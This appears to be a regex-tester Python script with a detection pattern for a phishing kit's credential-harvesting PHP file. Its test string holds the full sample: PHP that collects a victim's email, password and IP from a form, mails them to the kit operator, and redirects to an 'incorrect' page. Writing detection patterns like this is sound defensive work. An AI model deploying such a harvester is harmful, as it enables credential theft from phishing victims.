import re
regex = re.compile(r"^(?:[[:^print:][:cntrl:]\s]|GIF89.{0,20})*<\?(?:php)?\s*\$ip\s*=\s*getenv\(['\"]REMOTE_ADDR[\"']\);(\s*\$\w+\s*\.=\s*).{0,90}?\$_POST\[[\"']up_email[\"']\]\.\"\\n\";\s*\1['\"]\s*Password.{0,50}?\1['\"]confirm\s*password.{0,90}?\1['\"]\-+created\s*by\s*burhan\-+\\n[\"'];\s*include\s*[\"']email\.php.{0,50}?mail\([^;]+;\s*header\s*\(['\"]location:\s*\w+.php\?email=\$email(?:[^>]+>\s*)?$", flags=re.IGNORECASE | re.DOTALL)
test_str = ("<?\n"
" \n\n"
" \n\n"
" \n"
"$ip = getenv(\"REMOTE_ADDR\");\n"
"$message .= \"--------------New Login--------\\n\";\n"
"$message .= \"Email-ID : \".$_POST['up_email'].\"\\n\";\n"
"$message .= \" Password : \".$_POST['up__X_PASSWORD'].\"\\n\";\n"
"$message .= \"confirm password : \".$_POST['Password'].\"\\n\";\n"
"$message .= \"Client IP : \".$ip.\"\\n\";\n"
"$message .= \"---------------Created BY Burhan-----------\\n\";\n"
"include 'email.php';\n"
"$subject = \"--New Log $ip \";\n\n\n"
"mail($to,$subject,$message,$headers);\n\n\n\n"
"header (\"Location: incorrect.php?email=$email\".$_POST['up_email']);\n"
" \n"
"?>")
matches = regex.finditer(test_str)
for match_num, match in enumerate(matches, start=1):
print(f"Match {match_num} was found at {match.start()}-{match.end()}: {match.group()}")
for group_num, group in enumerate(match.groups(), start=1):
print(f"Group {group_num} found at {match.start(group_num)}-{match.end(group_num)}: {group}")